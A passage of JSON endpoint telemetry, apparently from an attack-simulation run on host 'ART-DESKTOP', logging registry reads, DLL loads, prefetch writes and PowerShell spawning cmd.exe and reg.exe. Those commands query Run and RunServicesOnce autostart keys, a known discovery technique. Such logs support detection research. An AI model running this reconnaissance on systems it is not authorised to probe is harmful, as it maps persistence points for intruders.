"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "findstr.exe", - "image_path": "C:\\Windows\\System32\\findstr.exe", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "file", - "file_name": "SEARCHPROTOCOLHOST.EXE-AFAD3EF9.pf", - "file_path": "C:\\Windows\\Prefetch\\SEARCHPROTOCOLHOST.EXE-AFAD3EF9.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883571016990000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "SEARCHFILTERHOST.EXE-AA7A1FDD.pf", - "file_path": "C:\\Windows\\Prefetch\\SEARCHFILTERHOST.EXE-AA7A1FDD.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883571017150000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "FINDSTR.EXE-4176B665.pf", - "file_path": "C:\\Windows\\Prefetch\\FINDSTR.EXE-4176B665.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883571115420000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571148710000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571148710000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571148710000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_value": "VFUProvider", - "timestamp": 131883571200110000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", - "registry_value": "StartTime", - "timestamp": 131883571200110000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "process", - "pid": 5508, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571308240000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" - }, - { - "event_type": "process", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "subtype": "terminate", - "timestamp": 131883571308240000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "process", - "pid": 7132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571308240000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3880, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571308400000, - "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3880, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571308390000, - "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3880, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571308390000, - "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3880, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571308390000, - "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3880, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571308390000, - "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3880, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571308390000, - "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" - }, - { - "event_type": "process", - "pid": 3880, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571308390000, - "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4708, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571310950000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571310890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571310890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571310890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571310890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571310890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" - }, - { - "command_line": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6392, - "ppid": 4708, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571311040000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571310890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "process", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "process", - "pid": 4708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7316, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571311200016, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7316, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7316, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7316, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7316, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7316, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" - }, - { - "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 400, - "ppid": 7316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571311299984, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001020A95001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "process", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571311360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "process", - "pid": 7316, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571311360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5512, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571311439984, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5512, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5512, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5512, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5512, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5512, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" - }, - { - "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7408, - "ppid": 5512, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571311550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": 